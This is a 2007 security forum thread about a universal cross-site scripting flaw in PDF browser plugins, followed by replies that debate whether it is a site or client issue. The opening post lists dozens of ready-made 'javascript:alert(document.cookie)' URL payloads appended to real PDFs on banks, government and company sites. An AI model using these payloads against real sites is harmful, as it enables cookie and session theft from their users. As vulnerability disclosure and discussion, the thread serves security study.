Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
UXSS is MAJOR
Posted by: eyeced
Date: January 04, 2007 05:50PM

I almost overlooked the 'Myspace XSS' post in here the other day, until i read up some more on the 23c3 conference, aswell as being bombarded with information through the mailing lists entitled UXSS. Anyway i just thought i'd share the fact that at the time of this post, websites hosting pdf files are vulnerable to javascript injection, which could lead to alot of 'crazy shit' to cut the story short. This can be exploited by simply putting url.com/asdf.pdf#anything=javascript:alert('cookeH').

To show you the gravity of this situation i have included *just a few* of the biggest websites on the internet in the exploitable state. (This is mearly for educational purposes as ever).

www.microsoft.com/windows2000/docs/TCO.pdf#blah=javascript:alert('cookeh')
http://docs.yahoo.com/docs/pr/pdf/1q05pr.pdf#fdf=javascript:alert(document.cookie)
http://pages.ebay.co.uk/businesscentre/BC_Guide.pdf#fdf=javascript:alert('hi')
https://www.paypal.com/en_US/pdf/PP_WebsitePaymentsStandard_IntegrationGuide.pdf#fdf=javascript:alert(document.cookie)
http://direct.motorola.com/ENS/pdfs/email-setup-hotmail.pdf#fdf=javascript:alert(document.cookie)
www.ofcom.org.uk/tv/obb/adv_comp/ab_17/a17.pdf#fdf=javascript:alert(document.cookie)
www.usembassy.org.uk/cons_new/visa/forms/e03.pdf#fdf=javascript:alert(document.cookie)
www.bankofengland.co.uk/publications/financialsanctions/sanctions060811.pdf#fdf=javascript:alert(document.cookie)
www.hm-treasury.gov.uk/media/A5F/A7/lettertogovofbofepbr03.pdf#fdf=javascript:alert(document.cookie)
www.halifax.ca/legislation/bylaws/hrm/blp-800.pdf#fdf=javascript:alert(document.cookie)
www.mcafee.com/us/local_content/case_studies/cs_halifax.pdf#fdf=javascript:alert(document.cookie)
www.barclays.co.uk/business/importantinfo/ats_june05.pdf#fdf=javascript:alert('secure online banking - u srs?')
www.lloydstsb.com/media/lloydstsb2004/pdfs/LTSBI_homeguide1.pdf#fdf=javascript:alert('secure online banking - u srs?')
http://www.natwest.com/microsites/private/site/pdf/Introduction_NatWest_Private_Banking.pdf#fdf=javascript:alert('eh')
http://www.nasa.gov/pdf/1968main_strategi.pdf#fdf=javascript:alert('eh')
www.citibank.com.au/global_docs/pdf/Citibank_Retirement_Index.pdf#fdf=javascript:alert('eh')
www.halifax.co.uk/filestore/HSB%20handbook%20May%202005%20pdf.pdf#fdf=javascript:alert('eh')
www.fbi.gov/pressrel/pressrel01/mail3.pdf#fdf=javascript:alert('eh')
https://www.bt.com/customerservices/downloads/malicious_calls.pdf#fdf=javascript:alert('eh')
members.aol.com/dswart/ElectricFruits.pdf#fdf=javascript:alert('eh')
www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#fdf=javascript:alert('eh')
www.apple.com/server/pdfs/UnderstandingUsingNetInfo.pdf#fdf=javascript:alert('eh')
http://www.morrisons.co.uk/AnnualReport06.pdf#fdf=javascript:alert('eh')
www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf#fdf=javascript:alert('eh')
www.skype.com/security/files/2005-031%20security%20evaluation.pdf#fdf=javascript:alert('eh')
www.sun.com/blueprints/0100/security.pdf#fdf=javascript:alert('eh')
http://www.adobe.com/products/pdfs/intelmacsupport.pdf#fdf=javascript:alert('eh')
http://images.amazon.com/media/i3d/01/golddisk.pdf#fdf=javascript:alert('eh')
http://www.php.net/~wez/extending-php.pdf#fdf=javascript:alert('eh')
http://upload.wikimedia.org/wikipedia/en/2/20/Davis_recall_petition.pdf#fdf=javascript:alert('eh')
http://assets.xbox.com/en-us/HardwareManuals/Controller_S.pdf#fdf=javascript:alert('badnewz is a badkid')
http://www.bungie.net/images/games/halo2/support/halo2manual_EN.pdf#fdf=javascript:alert('no srsly')
www.gfi.com/whitepapers/network-protection-against-email-threats.pdf#fdf=javascript:alert('eh')
www.leeds.ac.uk/iss/email/students/tut92.pdf#fdf=javascript:alert('eh')
http://msnbcmedia.msn.com/i/msnbc/sections/TVNews/Today%20show/PDF/OrganicPregnancy.pdf#fdf=javascript:alert('eh')
www.telewest.co.uk/pdfs/Tariff_Res_170403.pdf#fdf=javascript:alert('eh')
http://www.dell.com/downloads/global/corporate/environ/2006_sustainability_report.pdf#fdf=javascript:alert('eh')
http://communications.bestbuy.com/pressroom/includes/Releases/GeekSquadRelease.pdf#fdf=javascript:alert('eh')
http://ir.fedex.com/downloads/code.pdf#fdf=javascript:alert('eh')
http://www.whitehatsec.com/presentations/phishing_superbait.pdf#fdf=javascript:alert('eh')

The last one is the most ironic xss url i have ever seen!

Well i think you'll agree from the links above, this is seriously a major threat.

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: zeno
Date: January 04, 2007 06:42PM

Listing websites hosting PDF files is retarded. There is no site vuln here this is a client issue, please move along.

- zeno
http://www.cgisecurity.com/

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: rsnake
Date: January 04, 2007 07:05PM

Hahah... a little harsh there, eh, Zeno? I think what he's demonstrating is how dangerous the issue is. Not specifically outing those companies. Anyway, your point is right though, it's a client issue. Practically every website is vulnerable at this point because the clients need to be fixed.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: jungsonn
Date: January 05, 2007 01:14AM

Try to find some PDF's on my server ^^ that anchor(#) issue is going to hunt me for a looooooong time. *sigh*

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: eyeced
Date: January 05, 2007 10:31AM

http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf#zeno=javascript:alert('sorry%20chief')

Just one more for you zeno!

I appreciate the fact that it is not an individual site vulnerability, i was mearly highlightling some of the major sites that are vulnerable. (Or not depending on how you look at it).



Edited 1 time(s). Last edit at 01/06/2007 08:26AM by eyeced.

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: Anonymous User
Date: January 05, 2007 11:22AM

nice one, eyeced! ;)



Edited 1 time(s). Last edit at 01/05/2007 11:23AM by .mario.

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: jungsonn
Date: January 05, 2007 08:20PM

It surely would beat the 'soitbegins' thread if you poke Google with pdf dorks.

Options: ReplyQuote
Re: UXSS is MAJOR
Posted by: kirke
Date: January 06, 2007 04:25PM

zeno, your're 101% right from view of a developer, but you totally ignore one of the most important things here:
UXSS (using the threads title:) opens attacks for session riding/CSRF (aka web trojans etc.) in each and every application on each and every site (.anything.tld) where at least one .pdf is available. Your application is vulnerable then, even the hole site is XSS-safe.
Conclusion: either make your applications safe against session attacks (session hijacking/fixation/riding, CSRF, whatever), or simply remove all and every .pdf from the whole site.
Do you think that this is worth to be 101% right?

Options: ReplyQuote


Sorry, only registered users may post in this forum.